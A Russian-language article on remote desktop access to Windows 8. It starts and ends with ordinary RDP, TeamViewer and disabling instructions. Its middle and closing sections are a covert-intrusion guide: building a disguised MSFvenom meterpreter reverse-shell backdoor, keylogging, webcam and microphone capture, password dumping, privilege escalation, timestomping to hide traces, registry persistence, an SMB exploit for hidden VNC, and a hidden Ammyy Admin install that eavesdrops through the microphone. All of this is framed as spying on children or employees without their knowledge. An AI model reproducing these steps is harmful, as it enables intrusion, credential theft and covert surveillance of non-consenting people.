Подключение к удаленному рабочему столу Windows 8

Случается, что важные файлы, которые находятся на домашнем ПК, нужны в самых непредвиденных обстоятельствах – в командировке, на учебе и т.п. Если знакомые или родственники не смогут разобраться в специфике приложений или c поиском нужных объектов, то удаленное управление легко решит эту проблему. Благодаря сторонним программам или встроенным сервисам оболочки Windows 8 правильная их настройка обеспечит стабильный доступ к данным и возможность управления ими на расстоянии.

Содержание статьи

Что такое удаленный доступ к компьютеру Windows 8

Поддержка Удаленного рабочего стола предусмотрена только в редакции Enterprise и Professional оболочки Windows 8. Чтобы подключиться к другой машине, необходимо соблюдать совпадение операционных систем, поскольку для Linux или серверной Windows сделать это невозможно.

Операция подключения осуществляется за счет RDP протокола и подразумевает подключение машины к локальной или глобальной сети. Изначально подобные технологии встраивались исключительно в серверные версии оболочек. Однако многочисленные просьбы пользователей и мастеров, обслуживающих компьютеры, сподвигли разработчиков Microsoft на внедрение опции в систему Windows XP. Для восьмой версии данная система получила дополнительные коррекции и усовершенствования.

ВАЖНО: По умолчанию RDP-протокол после установки оболочки заблокирован. Это сделано в целях безопасности пользователей и их данных.

Для работы протокола удаленного доступа должно выполняться условие активной работы системы, т.е. отсутствие перехода ее в спящий режим. Учетная запись Windows 8 обязательно в целях безопасности должна быть запароленной.

Подключение к удаленному рабочему столу Windows 8 средствами оболочки

Начало настройки удаленного доступа производится с входа в «Свойства системы». Необходимо выполнить следующие шаги:

  1. Подключить и настроить конфигурацию удаленного рабочего стола можно через вызов «Свойств», что находится в контекстном меню значка «Мой компьютер».
  2. Здесь нужно перейти на ссылку «Настроить удаленное управление».Настройка удаленного доступа
  3. Зайти в открывшемся диалоговом окне на вкладку «Удаленный доступ».
  4. Триггерный переключатель нужно установить на «Разрешить…» и отметить флажком «Разрешить подключения только…», также устанавливаем галочку на соответствующей опции в блоке «Удаленный помощник».Разрешить удаленный доступ
  5. Чтобы в реестр данные изменения внеслись, нужно нажать кнопку «Применить», а окно закрывается нажатием на «Да».
  6. Для изменения названия группы нужно зайти в «Свойства» оболочки и там нажать «Изменить параметры».Изменить название Рабочей группы
  7. В диалоговом окне «Свойства системы» на вкладке «Имя ПК» выбрать «Изменить…», чтобы задать иное название Рабочей группы.Свойства системы
  8. В нижней форме с областью для внесения текста нужно прописать новое название и сохранить операцию. Чтобы изменения вступили в силу нужно перезапустить оболочку.
  9. Для организации связи требуется запуск службы для подключения к ПК. Для этого запускается приложение «Выполнить» с помощью комбинации «горячих клавиш» «Win» + «R» и в нем вводится команда «mstsc». Для подтверждения действий нажимается на клавиатуре «Enter».Вводится команда mstsc
  10. Посредством Командной строки необходимо вписать IP-адрес машины, к которой будет осуществляться доступ по удаленной связи. Это можно выполнить также посредством свойства подключения или плагина браузера. В строке ввода в командном интерпретаторе вводится «ipconfig /all».Ввод команды ipconfig _ all
  11. Спустя несколько минут должно выполниться подключение.Подключение к удаленному Рабочему столу
  12. Если осуществляется подключение правильно, то появляется диалоговое окно, в котором необходимо выбрать нужную учетную запись и ввести известный обеим сторонам коннекта пароль. Для обзора Рабочего стола удаленной машины нужно подтвердить действия нажатием на «ОК».Введение пароля
  13. В результате успешной проверки пароля должно появиться окно с данными о проверке сертификата. Нужно нажать «Да».
  14. Рабочий стол удаленной машины появится спустя несколько секунд.

ВАЖНО: За безопасность ПК волноваться необходимости нет, поскольку RDP-протокол передается только зашифрованным, а передача данных доступна для машин с одной рабочей группы.

Как подключиться к удаленному рабочему столу Windows 8 с помощью сторонних ресурсов

Несмотря на простоту настройки удаленного управления ПК в самой оболочке многим пользователям отсутствие возможности коннекта к машинам другой рабочей группы является серьезным препятствием. Для решения проблемы используются сторонние приложения, например, Team Viewer. Главное достоинство утилиты – это свободное распространение и простота в эксплуатации. Для использования данного ПО нужно:

  1. Запустить приложение, чтобы подключиться посредством RDP-протокола.
  2. В открывшемся окне перейти на вкладку «Удаленное управление».Team Viewer
  3. Необходимо одновременно запустить утилиту и на машине, к которой требуется подключение.
  4. Если данная вкладка открывается по умолчанию на обоих ПК, то в соответствующих полях следует ввести ID компьютера-партнера.
  5. Переключатель нужно переместить из «Передача файлов» на опцию «Удаленное подключение» и для закрепления действия нажать «Подключиться к…».
  6. Чтобы отобразился Рабочий стол удаленной системы нужно ввести заданные одинаковые для обеих машин пароли, соответствующие имена учетных записей. Нажать на «Вход в систему».Компьютеры и контакты
  7. При успешном коннекте доступ будет полностью открыт для действий с удаленного ПК.

Как включить удаленный доступ к компьютеру Windows 8 посредством инструмента Metasploit

Чаще всего к ПК удаленный доступ настраивается при обоюдном согласии владельцев обеих машин или устройств одного пользователя. Однако есть много других ситуаций, где требуется незаметное наблюдение за действиями пользователя. Это и контроль занятий на ПК детей, наблюдение за сотрудниками в рабочий период и т.п. Такой подход предохранит от небезопасных действий или потери полезного времени на игры или безделье. Для организации подобного мероприятия в среде Windows 8 есть инструмент Metasploit, который позволяет не только получить доступ к отображению рабочего стола, но и совершать много действий удаленно: захват с вебки видео- или аудио-сигнала, создание снимков в реальном времени веб-камерой, управление файлами и т.п.

Для воздействия на удаленный компьютер используется понятие «полезной нагрузки», которая заключается в выполнении определенного действия частью программы или кода. Чаще всего это вредоносные приложения, но любое вторжение таким образом на чужой ПК подразумевает вражеские намерения. Чтобы проникнуть на другую машину нужно пользоваться генератором такой нагрузки (MSFvenom в инструменте Metasploit) или писать код самостоятельно. Во втором варианте большая вероятность пропуска нежданного гостя антивирусной системой.

Существует понятие трояна и бэкдора. Здесь первое приложение объединяет группу ПО, которые несут полезную нагрузку и при этом воспринимаются системой как легитимная программа. Под бэкдором принято понимать технологию или выполняемый файл, который дает к информационному ресурсу несанкционированный доступ. Для организации удаленного доступа определение, к какой категории относится приложение, большой разницы не имеет, поскольку генерирование «– x» ключа приложением MSFvenom позволит создать программы с бэкдором.

Инструкция использования генератора MSFvenom:

  1. Рассмотреть использование, введением в Командной строке:Команда
  2. Отображение опций в следующем виде:Команды
  3. Для создания полезной нагрузки используется флаг –f и –p:Команды

Здесь нужно знать значение обозначений:

-o /tmp/my_payload.exe – сохрание в указанном файле сгенерированного кода;

-f exe – указывается как исполняемое приложение формат;

lport=4444 – код порта для обратного коннекта;

lhost=IP_подключающегося — адрес инициатора удаленного доступа;

-p windows/meterpreter/reverse_tcp – тип выбранной полезной нагрузки.

4. Указание флага -p для создания полезной нагрузки обязательно, только после него можно указать конкретно вид приложения и характер его действий. Для отображения имеющихся в системе Metasploit поддерживаемых нагрузок вводится команда:

Команда

Результат выполнения выводит следующий список.

Список

ПРИМЕЧАНИЕ: На сегодня в списке нагрузок инструмента Metasploit содержится от 538 позиций, созданных для различных платформ. Вид перечня содержит столбец с названием полезной нагрузки и краткую характеристику ее.

Одним из способов удаленного управления является работа утилиты через внедрение dll с динамической выгрузкой и загрузкой плагинов и скриптов. Чаще всего для такой цели применяется meterpreter. Если для прямого проникновения используется bind, что обозначает прослушивание конкретного порта в поисках подключающегося ПО, то обходить даже файерволы помогает reverse – самостоятельно инициирует коннект к нужному ПК. Использование удаленной технологии VNC подразумевает слово vncinject.

В широком смысле разделяется вся полезная нагрузка на две огромные категории:

  • требующая, после активации на удаленной машине, дополнительных действий;
  • не нуждающаяся в поддержке, действует после доставки на ПК.

Многие полезные нагрузки обладают определенными опциями, которые можно узнать с помощью флага —list-options. Для вывода информации об определенной нагрузке следует указывать флаг –p, например:

Команды

Список команд

Команды

Выведется на экран следующее:

Команды

В столбце Required указывается обязательность выполнения опции, что для некоторых имеет значение по умолчанию. При условии отсутствия данного параметра, он указывается в процессе непосредственной генерации.

В примере:

Команды

Не обязательно указывать значение 4444 для опции lport поскольку применяться будет параметр по умолчанию, а установка для lhost=IP_подключающегося указывается как LHOST.

Обязательный флаг кроме –p еще и –f, который для полезной нагрузки устанавливает ее формат. Для вывода перечня поддерживаемых параметров необходимо задать команду:

Команда

В результате на экране появится следующий список:

Команды

Среди наиболее популярных видов полезной нагрузки:

Команда

Команда для получения своего адреса IP:

Команда

Для отображения внешнего IP:

Команда

Например, в локальной сети с IP 192.168.0.196 команда:

Команда

Вызовет следующие действия:

Подключение к удаленному рабочему столу Windows 8

Это создаст приложение backdoor.exe.

Для комбинации нескольких полезных нагрузок используется флаг -c, что требует включения win32 файла с шеллкодом с указанием на такой:

Команда

Здесь указывается как включенный в полезную нагрузку файл mes1.

Команда

Прописывание -c mes2 позволяет внести в ранее сгенерированный бинарный компонент файла mes2:

Команда

В результате данных действий создается файл с расширением *.exe, который называется driver_dlya_tvoego_computera и в результате выполнения откроет пару окон с последующей попыткой подключения к удаленной машине.

С помощью опции -x указывается существующий шаблон файла, что снижает подозрение за счет замены существующего в оболочке файла или выполнения полезных функций. Благодаря опции –k с одновременным использованием с предыдущей сохраняет в поведении шаблона привычное для системы выполнение функций, запускающая полезную нагрузку в виде отдельного потока:

Команда

Инструкция по работе в Metasploit с бэкдорами:

1. На ПК, который подключается к другому пользователю нужно запустить генератор:

Команда

2. Прописать далее:

Команды

3. При выборе отличной от meterpreter/reverse_tcp полезной нагрузки необходимо проследить, чтобы была внесена своя строка в предыдущей команде. Для настройки порта локального ПК и IP прописывается:

Команды

4. Здесь указывается свой адрес IP вместо имеющегося локального 192.168.0.196. Настройка порта не требуется, если он не менялся. Не обязательно прописывать значение этого параметра, так как установка 4444 выполняется по умолчанию. Модуль запускается после выполнения всех вышеперечисленных настроек:

Команда

Модуль

5. На ПК, к которому осуществляется подключение, необходимо запустить компонент с полезной нагрузкой, что откроет сессию meterpreter в результате подключения бэкдора:

Бэкдор

Работа в Meterpreter: основные понятия

В интерпретаторе содержится множество команд, которые заучивать необходимости нет, поскольку с помощью команды «help» или «?» вызывается справка с основной информацией. Более полные данные по конкретной опции получить можно при введении в строке перед названием опции флага –h. Например, следующий параметр отобразит характеристики модуля, управляющего веб-камерой:

Команда

Вид выполнения операции

Перечень основных команд:

Список команд

Благодаря ключевым операциям процесс может автоматизироваться посредством выполнения из файла команд. Доступна запись в канал, последующее применение информации, а также фоновое выполнение многих других задач. Особое место занимают функции run и info, которые запускают выбранный модуль и показывают о нем информацию соответственно. Существует несколько команд, которые носят такое же название и используются для аналогичных целей в ОС Linux:

Команды

Для выгрузки приложения *.exe с названием driver_dlya_tvoego_computera на удаленную машину потребуется записать:

Команда

Команда

Просмотреть перечень имеющихся на удаленном ПК файлов, а также стянуть zip-архив allen можно так:

Команда

Команда

К Сетевым командам относятся следующие:

Сетевые команды

В числе Системных команд:

Системные команды

Благодаря именно этим командам производится доступ к удаленной ОС, что обеспечивает введение команд, завершения процессов, выключение машины, перезагрузка системы, выполнение команд оболочки, сбор данных и заметание следов.

Операции интерфейса пользователя:

Команды

С этим набором производится слежка за клавишами юзера, включение и отключения клавиатуры, мыши, создание скриншотов.

Чтобы начался захват нажатия клавиш необходимо прописать:

Команда

Для определения в отдельных приложениях последовательность нажатия клавиш нужно ввести:

Команда

Список

Веб-камерой управлять позволяет следующий набор команд:

Команды

Для проверки наличия жертв веб-камеры у ПК, необходимо выполнить следующее:

Команда

Как видно активная камера, с которой удаленно доступно сделать снимок, носит название SC-20FHL11146M. Чтобы запустить захват и сохранение картинки нужно прописать и поменять на нужное имя веб-девайса:

Команда

Команды

Команды, позволяющие снять аудиосигнал удаленно с конкретного ПК:

Команды

Операции, повышающие привилегии:

Команды

Список команд, работающих с базами паролей удаленного пользователя:

Команда

Перечень команд, которые работают с временными файловыми метками Timestomp:

Команды

Для устранения следов посещения удаленной машины нужно атрибут файла MACE подвергнуть изменению по времени создания, доступа или изменения записи.

Организация VNC скрытого доступа к удаленной машине

Чтобы организовать к удаленному ПК скрытый доступ через инструмент VNC нужно выбрать vncinject в качестве полезной нагрузки.

1. Примером может быть vncinject/reverse_tcp:

Полезная нагрузка

2. Если приложение Metasploit не запускалось, его следует открыть:

Запуск Metasploit

3. В интерпретаторе Metasploit нужно прописать следующее:

Команды

4. С помощью параметра set rhost устанавливается адрес IP, принадлежащий удаленному хосту.

ПРИМЕЧАНИЕ: Здесь используется строка exploit/windows/smb/ms09_050_smb2_negotiate_func_index, что отличает работу данного приложения от Meterpreter.

5. Если эксплойт и соответствующий исполняемый файл запустить, то будет отображаться рабочий стол удаленного ПК зеленого цвета.

С другой стороны аналогичные действия выполняет нагрузка разрядности х64:

windows/x64/vncinject/reverse_tcp.

ВАЖНО: Для использования данных возможностей просмотрщик VNC должен быть предустановлен на компьютере основного пользователя, который организовывает такой доступ.

Если посещение не является одноразовой акцией, то ест смысл позаботиться о закреплении бэкдора для повторных входов. Ранее это выполнялось скриптом persistence:

Скрипт

Сейчас Meterpreter с набором этих приложений является устаревшим, что требует использования post/windows/manage/persistence_exe модуля. Он в оболочке Windows устанавливает постоянную EXE полезную нагрузку.

В зависимости от привилегии скрипт будет запускаться:

  • SERVICE – требует привилегий для создания службы, запускающей нагрузку;
  • SYSTEM – при наделении файла привилегиями он запустится одновременно с системой;
  • USER – привилегий не требует и запуск нагрузки осуществится при входе в ОС конкретного пользователя.

Модуль обладает следующими опциями:

Команды

Проиллюстрировать запуск можно следующим образом:

Команды

Данная запись означает выгрузку файла payload.exe на удаленную машину, переименование его на default.exe с последующим запуском, использующим привилегии системы.

Другой пример:

Команды

Выгрузка файла

Информация, выводимая модулем, следующая:

Команды

Путь сохранения файла в системе:

Путь в системе к файлу

Запись в реестре для автозапуска приложения:

Скрытый удаленный доступ

Для последующей эксплуатации Metasploit есть следующие модули:

Расположение файла в реестре

Обеспечивает последующую эксплуатацию:

Модуль

Извлекает из Google Chrome браузера чувствительную информацию:

Модуль Metasploit

Извлекает из Total Commander имеющиеся там пароли:

Модуль Metasploit

Используется для разблокирования экрана оболочки:

Модуль Metasploit На учетные данные ОС осуществляется фишинговая атака:

Модуль Metasploit

Однако существует множество других модулей:

Список

Все они могут применяться в период Meterpreter сеанса.

ПРИМЕЧАНИЕ: Все изложенные выше инструкции применимы в том случае, если четко известны данные IP-адресов клиента и сервера (подключаемого и подключающегося пользователя), отключение антивирусов и т.п. В других случаях нужно искать методы решения подобных проблем в зависимости от используемого сценария.

Как отключить удаленный доступ к компьютеру Windows 8

Пользоваться запретом на удаленное подключение или закрывать его в системе, где машина обеспечивает работоспособность определенных ресурсов локальной группы не желательно. Это может навредить всей структуре, поэтому нужно учитывать данный момент. Если же препятствий нет, то отключить удаленное управление можно так:

  • установить общий запрет;
  • выключить помощника;
  • отключить системные службы.

Более детально эти шаги представлены ниже.

Этап 1. Установка общего запрета

Данное действие подразумевает использование функций, которые встроены в оболочку Windows 8.

1. Найти на Рабочем столе «Компьютер» и вызвать на нем контекстное меню, перейти в Свойства системы.

Свойства

2. В открывшемся окне зайти на вкладку «Настройка удаленного доступа».

Настройка

3. Это откроет диалоговое окно, где на вкладке «Удаленный доступ» необходимо установить триггер в положение «Не разрешать…». Для подтверждения нажать «Применить».

Запрет удаленного подключения

Данная операция не позволить выполнять на машине активные действия, но оставит лазейку через Помощника для просмотра событий на ПК.

Этап 2. Выключение помощника

Данное приложение предназначено для просмотра действий на другой машине удаленно. Для его отключения нужно:

1. В окне «Свойства системы» в блоке Удаленный помощник снять соответствующий флажок с «Разрешить подключения…», а для активации действий нажать «Применить».

Снятие флажка

Этап 3. Отключить системные службы

Если с помощью отключения помощника и установки запрета на доступ к машине есть возможность себя защитить от потери информации и злоумышленников, то дополнительные мероприятия не помешают. Системные службы позволят защитить от проникновения даже при условии внесенных изначально изменений в настройки доступа. Для работы с службами потребуется:

1. Вызвать на значке «Компьютер» контекстное меню и перейти в подпункт «Управление».

Опция Управление

2. В открывшемся окне нужно перейти на блок «Службы и приложения», где выбрать «Службы», что в правой части окна откроет содержащиеся файлы.

Службы

3. Первоочередно отключается доступ в «Службах удаленных…», что выполняется через вызов контекстного меню на соответствующем компоненте.

Свойства

4. Для остановки службы нужно установить режим «Отключена» в строке «Тип запуска». Подтверждение действий выполняется нажатием «Применить».

Отключение удаленного запуска

5. Помимо данной службы отключить необходимо еще несколько:

  • Удаленного помощника – отключение описывалось выше;
  • Удаленный реестр – для блокирования смены настроек пользователями сети системного реестра;
  • NetBIOS – протокол, с помощью которого в локальной сети обнаруживаются устройства;
  • WS-Management – обеспечивает управление машиной с помощью консольного интерпретатора;
  • Telnet – может называться не так, но обязательно содержать слово «Telnet». Служба обеспечивает аналогичные возможности для удаленного управления как WS-Management.

ВАЖНО: Работа с данными компонентами возможна только на Root-правах, поэтому с пользовательской учетной записи отключить или перенастроить не получится.

Скрытое удаленное управление компьютером Windows 8

Устроить управление машиной без ведома пользователя можно несколькими способами, в том числе сторонними ресурсами, распространяющимися на коммерческой основе. Именно такие продукты обходят антивирусное ПО и фаерволы, не оставляя следов своей деятельности на компьютере.

Одно из наиболее популярных приложений для скрытого управления ПК является Ammyy Admin. Оно обладает такими преимуществами:

  1. В рамках домашнего использования не требует оплаты за дистрибутив;
  2. Дополнительной опцией является включение интерактивного чата для прослушивания всего, что происходит с обратной стороны удаленной системы;
  3. Если лимит использования не превышается, то программу обнаружить невозможно;
  4. Если приложение настраивается правильно, то даже опытным компьютерщикам сложно ее обнаружить;
  5. Доступ к машине выполняется через Интернет с любого другого оборудования;
  6. Время подключения не превышает нескольких секунд.

Подключение и настройка параметров Ammyy Admin занимает всего минуту-две.

Инструкция по установке и настройке приложения на удаленном клиенте

  1. Скачать приложение с официального ресурса, найти его у себя в «Загрузках» или другой казанной при скачивании папке.Права доступа
  2. Запустить программу, нажать в главном меню окна на «Ammyy», а с появившегося списка выбрать «Настройки».Ammyy Admin
  3. В открывшемся диалоговом окне выбрать вкладку «Клиент», где нажать кнопку «Права доступа».
  4. Это откроет еще одно окно, где нужно нажать «Добавить».Настройки
  5. Далее следует заполнить строку Computer ID, где внести набор символов «ANY» , а также дважды ввести придуманный заранее пароль.Пароль и ID компьютера
  6. Зайти в меню главного окна приложения в пункт «Ammyy», где пункт со стрелочкой «Служба» при наведении откроет еще один список. Здесь следует выбрать «Установить».Установка доступа
  7. Снова зайти в «Ammyy», перейти в «Службы», но на этот раз выбрать «Запустить».Запуск Службы
  8. Программу теперь можно закрыть. После данных настроек с каждой загрузкой оболочки будет скрыто запускаться Ammyy Admin.
  9. Для отключения признаков наличия удаленного управления на машине нужно перейти в главном меню на пункт «Ammyy» и выбрать там «Настройки». Это откроет диалоговое окно, где необходимо все флажки, кроме первого, снять. Для подтверждения действий нажать «ОК».
  10. Данные ID компьютера нужно обязательно запомнить или записать, поскольку для подключения данная информация понадобится. Отображается ID в зеленом поле главного окна приложения.Ваш ID

Теперь все настройки завершены. Подключиться с имеющимся ID и паролем доступно с любой точки мира, имея под рукой доступ к интернету и при условии подключения проверяемой машины.

Инструкция по установке и настройке приложения на основном компьютере, с которого выполняется удаленное управление

  1. Прежде всего, необходимо скачать дистрибутив приложения или воспользоваться имеющемся на переносном носителе, который использовался для установки на ПК-клиент.
  2. После установки запустить программу Ammyy Admin, в открывшемся главном окне ввести данные клиентского оборудования, а именно IP адрес и ID машины.
  3. После выбора опции «Только просмотр» для дальнейших операций понадобится подтвердить вход нажатием на «Подключиться».Подключение в Ammyy Admin
  4. В открывшемся окне аутентификации необходимо написать придуманный ранее пароль.
  5. С помощью режима «Voice Chat» или кнопки голосового прослушивания можно получить доступ к микрофонам машины. Чтобы с другой стороны не услышали аналогичную связь, необходимо в меню главного окна «Ammyy» найти пункт «Настройки» и перейти на вкладку «Общие». Здесь для опции «Audio Recording Device» установить режим «OFF». Если звука не будет с ПК клиента, нужно проверить подключение данной настройки на оборудовании.
  6. Как только подключение осуществится, будет выведен экран компьютера, на котором производится мониторинг действий.
  7. Для остановки работы приложения его нужно закрыть.